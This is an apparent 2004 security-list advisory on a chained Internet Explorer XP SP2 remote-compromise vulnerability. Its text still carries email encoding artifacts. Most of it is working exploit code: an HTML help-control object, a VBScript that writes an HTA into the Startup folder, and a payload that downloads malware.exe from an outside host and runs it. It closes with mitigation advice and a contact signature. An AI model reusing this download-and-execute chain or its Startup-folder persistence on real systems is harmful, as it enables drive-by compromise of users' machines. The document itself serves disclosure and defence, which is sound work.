Did they really do a good job on service pack = 2? Was it worth the investment that’s reported more then the missile = defense system? All these articles on the great achievement by Microsoft = and XP SP2 really merit? They totally forgot HTA files and HTM help files. Who knows that else.

“Microsoft SP2 team, that is unacceptable, = YOUR FIRED.” Donald Trump

http:= //freehost07.websamba.com/greyhats/sp2rc-analysis.htm

Microsoft Internet Explorer XP SP2 Fully Automated Remote = Compromise

Dec, 21 2004

Vulnerable
----------
- Microsoft Internet Explorer 6.0
- Microsoft Windows XP Pro SP2
- Microsoft Windows XP Home SP2

Not Tested
------------------------
- Microsoft Windows 98
- Microsoft Internet Explorer 5.x
- Microsoft Windows 2003 Server

Severity
---------
Critical - Remote code execution, no user = intervention

Intro
------
Although hundreds of millions of dollars have been spent on securing = SP2, perfection is impossible. Through the joint effort of Michael Evanchik = (http://www.michaelevanchik.com) and Paul from Greyhats Security (http://greyhats.cjb.net), a very critical vulnerability has been developed that can compromise a = user's system without the need for user interaction besides visiting the = malicious page. The vulnerability is not actually a vulnerability in itself, but = rather it is uses multiple known holes in SP2 including Help ActiveX Control = Related Topics Zone Security Bypass Vulnerability and Help ActiveX Control = Related Topics Cross Site Scripting Vulnerability.

Why Microsoft has still not patched two of these known vulnerabilities that = have been out for almost a half of year now, is beyond = me.

Tech Stuff and Explanation
--------------------------

1. Create a webpage with the following code:

sp2rc.htm
---------------------------------------------------------------------
= <OBJECT id=3D"localpage" = type=3D"application/x-oleobject" classid=3D"clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" = height=3D7%
style=3D"position:absolute;top:140;left:72;z-index:100;" codebase=3D"hhctrl.ocx#Version=3D5,2,3790,1194" = width=3D"7%">
<PARAM name=3D"Command" value=3D"Related Topics, = MENU">
<PARAM name=3D"Button" value=3D"Text:Just a = button">
<PARAM name=3D"Window" = value=3D"$global_blank">
<PARAM name=3D"Item1" = value=3D"command;file://C:\WINDOWS\PCHealth\HelpCtr\System\blurbs\to= ols.htm">
</OBJECT>

Explanation of above code:
The first object (id: localpage) tells hhctrl.ocx to open a help popup = window to the location C:\WINDOWS\PCHealth\HelpCtr\System\blurbs\tools.htm. = This file was chosen because it is treated as the local zone and it doesn't have = any script to mess us up. On some computers an error is shown before the = popup. This is the user's only chance to prevent the vulnerability from = working. If internet explorer were to be closed at this point, the user would be = safe.

The second object (id: inject) tells the help popup to navigate to a = javascript protocol, which executes. Thus, cross site scripting has just taken = place. A script tag that uses a remote file is written to the page, and = writehta.txt (below) is executed in the unsecured local = zone.

In the script, HHClick is able to be used to automate the vulnerability. This = is more effective than the previously described method of requiring a user to = click on a button.

2. Writehta.txt uses adodb recordset to write Microsoft Office.hta to = the user's startup folder. See Michael Evanchik's analysis of the drag and = drop vulnerability for an explanation on adodb = recordset.

Also it is reported that a ADODB recordset can be build locally without using a = http server or ftp server like below.

writehta.txt
---------------------------------------------------------------------
= Dim Conn, rs
Set Conn =3D CreateObject("ADODB.Connection")
Conn.Open "Driver=3D{Microsoft Text Driver (*.txt; *.csv)};" = & _
"Dbq=3Dhttp://www.malware.com;" & _
"Extensions=3Dasc,csv,tab,txt;" & _
"Persist Security Info=3DFalse"
Dim sql
sql =3D "SELECT * from foobar.txt"
set rs =3D conn.execute(sql)
set rs =3DCreateObject("ADODB.recordset")
rs.Open "SELECT * from foobar.txt", conn
rs.Save "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Microsoft Office.hta", adPersistXML
rs.close
conn.close
window.close
---------------------------------------------------------------------

3. f00bar.txt (thanks malware for hosting this file) is the file = requested by the adodb recordset (again, read the drag and drop analysis at www.michaelevanchik.com for = an explanation on how this works and why the the f00bar.txt looks like it = does). Because there is absolutely no limit on what you can do in an hta file, = an old, yet effective method of requesting and saving a file to the user's hd is = used. >>From that, a wscript shell is created and used to run the program. And = now, ladies and gentlemen, we have compromised the user's = machine.

f00bar.txt
---------------------------------------------------------------------
= "meaning less shit i had to put here"
"<script language=3Dvbscript> crap =3D """
""": on error resume next: crap =3D = """
""" : set o =3D CreateObject(""msxml2.XMLHTTP"") : = crap=3D"""
""" : o.open ""GET"",""http://freehost07.websamba.com/gr= eyhats/malware.exe"",False : crap=3D"""
""" : o.send : crap=3D"""
""" : set s =3D = createobject(""adodb.stream"") : crap=3D"""
""" : s.type=3D1 : crap=3D"""
""" : s.open : crap=3D"""
""" : s.write o.responseBody : = crap=3D"""
""" : s.savetofile = ""C:\malware.exe"",2 : crap=3D"""
""" : Set ws =3D CreateObject(""WScript.Shell"") : = crap=3D"""
""" : ws.Run ""C:\malware.exe"", 3, = FALSE : crap=3D"""
"""</script> crap=3D"""
---------------------------------------------------------------------

4. Upload hhtctrl.ocx for the computers that don’t happen to = have this control. All XP's seem to have this by default, some win2k3's = do not (according to Michael Evanchik)

Proof of Concept?
------------------
- http://freehos= t07.websamba.com/greyhats/sp2rc.htm

- If an error is shown, press OK. This is normal.

- Notice in your startup menu a new file called Microsoft Office.hta. When run, = this file will download and launch a harmless executable (which includes a = pretty neat fire animation)

Vendor Recommendations
----------------------
- Like Michael Evanchik said in his previous analysis, Microsoft needs = to apply XP Service Pack 2's local zone lockdown to .HTA files and HTML Help = (chm) files as well.

- This might be a little farfetched, but it would solve a lot of problems: Take = out the startup folder and only support running files during startup through = the registry. The startup folder is a major part of this vulnerability and I = can almost guarantee it will be used for another remote = compromise.

- Microsoft could possibly take HTA files out altogether. I have not seen = them used for anything beyond hacking.

- No vulnerability is too small or too insignificant to be taken seriously. = Treat every vulnerability as if it could be dangerous. =

User Recommendations
---------------------
- Disable hta files.
- Get yourself antivirus software. I recommend Symantec because once = they get their lazy asses off the couch and fix some of this stuff you will be a = lot better off.
- Disable active scripting in Internet Explorer. If nothing else, do = this.
- Do not use Internet Explorer, use Mozilla Firebird (now known as FireFox www.mozilla.org)

Credit
------
Paul from Greyhats
Michael Evanchik
Http equiv (thanks for allowing me to use your server for = f00bar.txt)

Greets
------
- Liu Die Yu (all the work you've done is = amazing)

Contact
-------
paul@greyhats.cjb.net
http://greyhats.cjb.net

Note
-----
Greyhats is becoming bigger and is in need of an upgrade. If anyone is interested in donating some webspace and a domain name I would be very appreciative. Contact me so that we may work something out = :)

Michael Evanchik

Relationship1

p: 914-921-4400

f: 914-921-6007

mailto:mevanchik@relationship= 1.com

web: http://www.relationship1.com